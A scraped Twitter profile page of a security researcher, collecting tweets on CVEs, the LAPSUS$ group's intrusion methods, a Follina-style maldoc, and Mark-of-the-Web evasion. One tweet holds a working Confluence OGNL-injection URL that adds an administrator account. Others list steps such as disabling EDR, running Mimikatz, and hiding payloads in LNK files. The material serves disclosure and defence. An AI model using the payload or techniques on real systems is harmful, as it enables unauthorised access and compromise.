Wojciech Pawlikowski (@wpawlikowski) 's Twitter Profile
Wojciech Pawlikowski

@wpawlikowski

Do or do not. There is no try.

ID: 36327292

calendar_today29-04-2009 10:10:31

2,2K Tweet

1,1K Takipçi

3,3K Takip Edilen

Wojciech Pawlikowski (@wpawlikowski) 's Twitter Profile Photo

So to sum up LAPSUS$ TTPs: - Bing search for exploits on GitHub - Disable EDR - Download Mimikatz - Obtain DA creds from files (DomAdmins-LastPass.xlsx) - - Persistence and exfiltration via forwarding rules - Game over :D

WIRED (@wired) 's Twitter Profile Photo

Today WIRED is releasing an early, 15,000-word excerpt from Andy Greenberg's new book 'Tracers In The Dark' that tells the story of the crypto-tracing case that led to the takedown of the largest known child sex abuse site ever: wired.trib.al/Gm9KbKk 🎨: Mike Mcquade

Today WIRED is releasing an early, 15,000-word excerpt from Andy Greenberg's new book 'Tracers In The Dark' that tells the story of the crypto-tracing case that led to the takedown of the largest known child sex abuse site ever: wired.trib.al/Gm9KbKk

🎨: Mike Mcquade
ZachXBT (@zachxbt) 's Twitter Profile Photo

1/ In a span of just two months from October 2021 - November 2021 we saw Homer.eth (formerly @homer_eth) create and rug pull 5 different projects and profit over $2.8m. Let’s breakdown where the funds when and identify the alleged perpetrator behind it.

1/ In a span of just two months from October 2021 - November 2021 we saw Homer.eth (formerly @homer_eth) create and rug pull 5 different projects and profit over $2.8m.

Let’s breakdown where the funds when and identify the alleged perpetrator behind it.
nao_sec (@nao_sec) 's Twitter Profile Photo

Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. virustotal.com/gui/file/4a240…

Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.
virustotal.com/gui/file/4a240…
HTTPVoid (@httpvoid0x2f) 's Twitter Profile Photo

PoC - localhost/${%23this.getUserAccessor().addUser('httpvoid','pwn@1234','[email protected]','HttpVoid',%40com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString("confluence-administrators,confluence-users"))}/ to add a new admin user.

PoC - localhost/${%23this.getUserAccessor().addUser('httpvoid','pwn@1234','pwn@httpvoid.com','HttpVoid',%40com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString("confluence-administrators,confluence-users"))}/ to add a new admin user.
mgeeky | Mariusz Banach (@mariuszbit) 's Twitter Profile Photo

☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210) 1. if doc has MOTW, macros are disabled. 2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled ISOs are no longer effective containers for MOTW evasion. However, bundling payloads into LNK is 🔥

☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210)

1. if doc has MOTW, macros are disabled.
2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled

ISOs are no longer effective containers for MOTW evasion.

However, bundling payloads into LNK is 🔥
Wojciech Pawlikowski (@wpawlikowski) 's Twitter Profile Photo

The OpenSSL team must be fans of Hitchock with all these tension building openssl.org/news/secadv/20… #yeahitsofficial #nocriticaljusthigh

chompie (@chompie1337) 's Twitter Profile Photo

Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious! securityintelligence.com/posts/critical…

chompie (@chompie1337) 's Twitter Profile Photo

My new blog post! Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”. Reverse engineering CVE-2022-34718 + write a remote Denial of Service exploit. Covers IPsec and IPv6 fragmentation in the Windows kernel, bin-diffing, and making weird packets securityintelligence.com/posts/dissecti…